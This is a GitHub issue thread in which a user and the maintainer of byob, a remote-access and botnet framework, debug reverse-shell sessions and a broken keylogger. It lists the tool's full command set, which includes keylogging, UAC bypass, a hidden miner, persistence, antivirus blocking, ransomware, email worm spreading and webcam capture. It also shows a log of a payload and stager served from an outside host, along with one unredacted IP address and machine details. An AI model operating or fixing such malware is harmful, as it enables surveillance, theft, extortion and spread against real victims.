### ISSUE TITLE
Shell

### ISSUE THREAD

**Issue by fabilus11** [malwaredllc/byob#201]
I first thought that I made a mistake when I used the shell command but it seems like my shell is broke. I accessed the shell of my VM and then typed keylogger run
then the shell immediately closed.

```
[37m[1m[fabian @ C:\Users\fabian\Desktop\byob]>shell 0


Starting Reverse TCP Shell w/ Session 0...

[37m[1m[ 0 @ C:\Users\fabi\Downloads ]>help

_Help command output_

 [37m[1m[ 0 @ C:\Users\fabi\Downloads ]>pwd

C:\Users\fabi\Downloads

[37m[1m[ 0 @ C:\Users\fabi\Downloads ]>help keylogger

   command <arg>                                                      description
 keylogger [mode]
        Log user keystrokes

        `Required`
        :param str mode:    run, stop, status, upload



 [37m[1m[ 0 @ C:\Users\fabi\Downloads ]>keylogger run
Exception in thread 1586902874.7410786:
Traceback (most recent call last):
  File "C:\Users\fabia\AppData\Local\Programs\Python\Python37\lib\threading.py", line 926, in _bootstrap_inner
    self.run()
  File "C:\Users\fabia\AppData\Local\Programs\Python\Python37\lib\threading.py", line 870, in run
    self._target(*self._args, **self._kwargs)
  File "server.py", line 783, in serve_until_stopped
    info = self.database.handle_session(session.info)
  File "C:\Users\fabia\Desktop\byob\core\database.py", line 231, in handle_session
    buid = str(info['public_ip'] + info['mac_address']).encode()
KeyError: 'public_ip'

Session 0 disconnected
[37m[1m[fabian @ C:\Users\fabian\Desktop\byob]>
```

**Comment by fabilus11** [comment]
after that, I tried reconnecting the client (I just tried to open the .exe file again.) but it wasn´t connecting at all

**Comment by malwaredllc** [comment]
Can your VM only access your internal network? The `public_ip` attribute is populated by a call to an API (`http://api.ipify.org`) - if your VM can't access that, then this would explain that error.

Before you use the `shell` command to interact with the client, can you please run the `sessions` command on the server and show me the output?

**Comment by fabilus11** [comment]
It should have a connection to the internet and not the internal network.

```
88                                  88
88                                  88
88                                  88
88,dPPYba,  8b       d8  ,adPPYba,  88,dPPYba,
88P'    "8a `8b     d8' a8"     "8a 88P'    "8a
88       d8  `8b   d8'  8b       d8 88       d8
88b,   ,a8"   `8b,d8'   "8a,   ,a8" 88b,   ,a8"
8Y"Ybbd8"'      Y88'     `"YbbdP"'  8Y"Ybbd8"'
                d8'
               d8'


[?]  Hint: show usage information with the 'help' command

[fabia @ C:\Users\fabia\Desktop\byob]>

[+] Connection: xxx.xxx.xxx.xxx
    Session: 0
    Started: Wed Apr 15 00:56:36 2020

[fabian @ C:\Users\fabian\Desktop\byob]>  sessions

0
  username           fabi
  administrator      False
  longitude          xx.xxxx
  uid                d558cc790de912b5432970f16bbb1586
  local_ip           192.168.178.51
  online             True
  joined             2020-04-15 00:56:40.966000
  owner              None
  last_online        2020-04-15 00:56:40.966000
  public_ip          xxx.xxx.xxx.xxx
  platform           win32
  architecture       64
  sessions           True
  mac_address        80:02:7B:E6:29:2
  device             DESKTOP-P3FEAC8.fritz.box
  latitude           xx.xxxx

[fabian @ C:\Users\fabian\Desktop\byob]>
```

**Comment by malwaredllc** [comment]
I understand if you don't want to post your public IP on here for privacy reasons, but can you tell me if the field is populated and is a valid IP?

**Comment by fabilus11** [comment]
I also ran it on the host machine and it also had an error

```
[37m[1m[fabian @ C:\Users\fabian\Desktop\byob]>shell 1


Starting Reverse TCP Shell w/ Session 1...

[37m[1m[ 1 @ C:\Users\fabian\Desktop\byob\dist ]>help

                command <arg>                                               description
 abort                                                 abort execution and self-destruct
 cat <path>                                            display file contents
 cd <path>                                             change current working directory
 escalate                                              attempt uac bypass to escalate privileges
 eval <code>                                           execute python code in current context
 execute <path> [args]                                 run an executable program in a hidden process
 help [cmd]                                            show usage help for commands and modules
 icloud                                                check for logged in icloud account on macos
 keylogger [mode]                                      log user keystrokes
 kill                                                  shutdown the current connection
 load <module> [target]                                remotely import a module or package
 ls <path>                                             list the contents of a directory
 miner <url> <user> <pass>                             run cryptocurrency miner in the background
 outlook <option> [mode]                               access outlook email in the background
 packetsniffer [mode]                                  capture traffic on local network
 passive                                               keep client alive while waiting to re-connect
 persistence <add/remove> [method]                     establish persistence on client host machine
 portscanner <target>                                  scan a target host or network to identify
 process <mode>                                        utility method for interacting with processes
 pwd                                                   show name of present working directory
 restart [output]                                      restart the shell
 screenshot                                            capture a screenshot from host device
 show <value>                                          show value of an attribute
 spread <gmail> <password> <URL email list>            activate worm-like behavior and begin spreading client via email
 stop <job>                                            stop a running job
 upload [file]                                         upload file from client machine to the c2 server
 webcam <mode> [options]                               capture image/video from client webcam
 wget <url>                                            download file from url

 [37m[1m[ 1 @ C:\Users\fabian\Desktop\byob\dist ]>keylogger run
Session init exception: Invalid base64-encoded string: number of data characters (69) cannot be 1 more than a multiple of 4


[-] Failed Connection: xxx.xxx.xxx.xxx

None Session 1 disconnected
[37m[1m[fabia @ C:\Users\fabia\Desktop\byob]>
```

**Comment by fabilus11** [comment]
> I understand if you don't want to post your public IP on here for privacy reasons, but can you tell me if the field is populated and is a valid IP?

yes it is my correct ip

**Comment by fabilus11** [comment]
and sometimes I also get this error

```
[37m[1m[fabian @ C:\Users\fabian\Desktop\byob]>shell 0


Starting Reverse TCP Shell w/ Session 2...

[37m[1m[ 2 @ C:\Users\fabi\Downloads ]>help
ciphertext block must be 16 bytes
```

**Comment by malwaredllc** [comment]
I just pushed some bug fixes - specifically, can you tell me if you come across the `ciphertext block must be 16 bytes` error?

**Comment by fabilus11** [comment]
I have come across that error you asked. It only occurred when I used the help command (I don´t remember if it just was in the shell or in both) but I mostly had it when I tried reconnecting everything and restarted server and client and accidentally opened the exe more than once (so that I had just one client but multiple sessions) but it also occurred once when everything was "normal"

**Comment by malwaredllc** [comment]
@fabilus11 Did you update the code after my last fix? If so, can you show me a screenshot or copy/paste it please? The `ciphertext block must be 16 bytes` error should be getting caught instead of thrown.

**Comment by fabilus11** [comment]
I will take a look at it later I somehow managed to damage my cmd or Th python file isn´t working because it gets stuck at a certain point

```

88                                  88
88                                  88
88                                  88
88,dPPYba,  8b       d8  ,adPPYba,  88,dPPYba,
88P'    "8a `8b     d8' a8"     "8a 88P'    "8a
88       d8  `8b   d8'  8b       d8 88       d8
88b,   ,a8"   `8b,d8'   "8a,   ,a8" 88b,   ,a8"
8Y"Ybbd8"'      Y88'     `"YbbdP"'  8Y"Ybbd8"'
                d8'
               d8'


[>] Modules
        Adding modules...  (3 modules added to client)

[>] Imports
        Adding imports... (26 imports from 3 modules)

[>] Payload
        Uploading payload...  (hosting payload at: http://seöfhost.ddnss.de:6970///payloads/w1R.py)

[>] Stager
        Uploading stager...  (hosting stager at: http://seöfhost.ddnss.de:6970///stagers/w1R.py)

[>] Dropper
        Writing dropper...  (351 bytes written to byob_w1R.py)
```

I have a little loading symbol on my cursor though... idk what I did but I will try to fix it

**Comment by fabilus11** [comment]
I just updated my code and don´t have the `ciphertext block must be 16 bytes` error.
but I have another error when I am in the shell

```
88                                  88
88                                  88
88                                  88
88,dPPYba,  8b       d8  ,adPPYba,  88,dPPYba,
88P'    "8a `8b     d8' a8"     "8a 88P'    "8a
88       d8  `8b   d8'  8b       d8 88       d8
88b,   ,a8"   `8b,d8'   "8a,   ,a8" 88b,   ,a8"
8Y"Ybbd8"'      Y88'     `"YbbdP"'  8Y"Ybbd8"'
                d8'
               d8'


[?]  Hint: show usage information with the 'help' command

[37m[1m[fabian@ C:\Users\fabian\Downloads\byob]>

[+] New Connection: 31.16.144.155
    Session: 0
    Started: Fri Apr 17 15:48:51 2020

[fabian @ C:\Users\fabian\Downloads\byob]>  shell 0


Starting Reverse TCP Shell w/ Session 0...

[37m[1m[ 0 @ C:\Users\fabian\Downloads\byob\dist ]>help keylogger
Expecting value: line 1 column 1 (char 0)

```

**Comment by fabilus11** [comment]
after that error, my console gets stuck and I have to restart it

**Comment by fabilus11** [comment]
and I still have the keylogger error with the new code (and I'm also not running it at a VM this time)
```
[fabian @ C:\Users\fabian\Downloads\byob]>  shell 0


Starting Reverse TCP Shell w/ Session 0...

[37m[1m[ 0 @ C:\Users\fabian\Downloads\byob\dist ]>keylogger run
Session init exception: Invalid base64-encoded string: number of data characters (73) cannot be 1 more than a multiple of 4


[-] Failed Connection: 31.16.144.155

None
```

**Comment by fabilus11** [comment]
and I still have the keylogger error with the new code (and I'm also not running it at a VM this time)
```
[fabian @ C:\Users\fabian\Downloads\byob]>  shell 0


Starting Reverse TCP Shell w/ Session 0...

[37m[1m[ 0 @ C:\Users\fabian\Downloads\byob\dist ]>keylogger run
Session init exception: Invalid base64-encoded string: number of data characters (73) cannot be 1 more than a multiple of 4


[-] Failed Connection: xxx.xxx.xxx.xxx

None
```

**Comment by malwaredllc** [comment]
@fabilus11  Try some different commands - the keylogger module relies on an old library called pyHook and has some problems. I will try to fix it this weekend.

**Comment by fabilus11** [comment]
I tried the help cmd for the webcam module.
```
[ 0 @ C:\Users\fabian\Desktop\byob\dist ]>help

                command <arg>                                                description
 abort                                         abort execution and self-destruct
 bg [id]                                       background a session (default: the current session)
 broadcast <command>                           broadcast a task to all active sessions
 cat <path>                                    display file contents
 cd <path>                                     change current working directory
 clients                                       show all clients that have joined the server
 debug <code>                                  run python code directly on server (debugging MUST be enabled)
 escalate                                      attempt uac bypass to escalate privileges
 eval <code>                                   execute python code in current context
 execute <path> [args]                         run an executable program in a hidden process
 exit                                          quit the server
 help [cmd]                                    show usage help for commands and modules
 icloud                                        check for logged in icloud account on macos
 keylogger [mode]                              log user keystrokes
 kill <id>                                     end a session
 load <module> [target]                        remotely import a module or package
 ls <path>                                     list the contents of a directory
 miner <url> <user> <pass>                     run cryptocurrency miner in the background
 options                                       show currently configured settings
 outlook <option> [mode]                       access outlook email in the background
 packetsniffer [mode]                          capture traffic on local network
 passive                                       keep client alive while waiting to re-connect
 persistence <add/remove> [method]             establish persistence on client host machine
 portscanner <target>                          scan a target host or network to identify
 process <block/monitor>                       block process (e.g. antivirus) or monitor process
 pwd                                           show name of present working directory
 query <statement>                             query the SQLite database
 ransom [id]                                   encrypt client files & ransom encryption key for a Bitcoin payment
 restart [output]                              restart the shell
 results [id]                                  display all completed task results for a client (default: all clients)
 screenshot                                    capture a screenshot from host device
 sessions                                      show active client sessions
 set <setting> [option=value]                  change the value of a setting
 shell <id>                                    interact with a client with a reverse TCP shell through an active session
 show <value>                                  show value of an attribute
 spread <gmail> <password> <URL email list>    activate worm-like behavior and begin spreading client via email
 stop <job>                                    stop a running job
 tasks [id]                                    display all incomplete tasks for a client (default: all clients)
 upload [file]                                 upload file from client machine to the c2 server
 webcam <mode>                                 capture image/video from the webcam of a client device
 wget <url>                                    download file from url

 [ 0 @ C:\Users\fabian\Desktop\byob\dist ]>help webcam
No JSON object could be decoded
```

**Comment by fabilus11** [comment]
and I also get 
 ```
[37m[1m[ 0 @ C:\Users\fabia\Desktop\byob\dist ]>help persistence
Expecting value: line 1 column 1 (char 0)
```

**Comment by fabilus11** [comment]
and I also get

```
�[37m�[1m[ 0 @ C:\Users\fabian\Desktop\byob\dist ]>help persistence
Expecting value: line 1 column 1 (char 0)
```

**Comment by malwaredllc** [comment]
@fabilus11 This issue is now fixed. I will also be adding more details to the usage information for commands displayed with the 'help' command soon as well.
